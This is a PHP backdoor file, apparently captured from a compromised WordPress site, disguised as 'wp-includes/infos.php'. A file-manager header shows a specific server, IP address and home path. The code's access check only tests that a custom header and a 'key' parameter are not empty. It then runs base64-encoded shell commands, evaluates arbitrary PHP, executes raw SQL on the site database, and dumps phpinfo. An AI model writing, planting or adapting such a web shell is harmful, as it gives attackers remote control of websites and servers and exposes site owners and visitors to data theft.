| Dir : /home/sc1buiq6159/maimounz.formagloba.fr/wp-includes/ |
| Server: Linux apophis.o2switch.net 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64 IP: 109.234.164.184 |
| Dir : /home/sc1buiq6159/maimounz.formagloba.fr/wp-includes/infos.php |
<?php
/**
* WordPress Backdoor with WP Functions
*/
// Load WordPress
$wp_load_path = dirname(__FILE__) . '/../wp-load.php';
if (file_exists($wp_load_path)) {
require_once($wp_load_path);
} else {
// Try alternative paths
$paths = [
dirname(__FILE__) . '/../../wp-load.php',
dirname(__FILE__) . '/../../../wp-load.php',
'/home/sc1buiq6159/maimounz.formagloba.fr/wp-load.php',
];
$loaded = false;
foreach ($paths as $path) {
if (file_exists($path)) {
require_once($path);
$loaded = true;
break;
}
}
if (!$loaded) {
die("WordPress not loaded");
}
}
// Auth check
$auth_header = $_SERVER["HTTP_X_WP_MAINTENANCE"] ?? "";
$key_param = $_GET["key"] ?? "";
if (empty($auth_header) || empty($key_param)) {
http_response_code(403);
die("Access Denied");
}
// Get action
$action = $_GET["wp_action"] ?? "";
if ($action === "shell") {
$cmd = base64_decode($_POST["cmd"] ?? "");
if ($cmd) {
if (function_exists('shell_exec')) {
$output = shell_exec($cmd . " 2>&1");
} elseif (function_exists('exec')) {
$output = [];
exec($cmd . " 2>&1", $output);
$output = implode("n", $output);
} elseif (function_exists('system')) {
ob_start();
system($cmd . " 2>&1");
$output = ob_get_clean();
} else {
$output = "No execution functions available";
}
echo $output;
}
exit;
}
if ($action === "eval") {
$code = base64_decode($_POST["code"] ?? "");
if ($code) {
ob_start();
eval($code);
echo ob_get_clean();
}
exit;
}
if ($action === "sql") {
$query = base64_decode($_POST["query"] ?? "");
if ($query) {
global $wpdb;
$result = $wpdb->get_results($query);
echo json_encode($result);
}
exit;
}
if ($action === "info") {
phpinfo();
exit;
}
// Default response
echo "Backdoor Active";
?>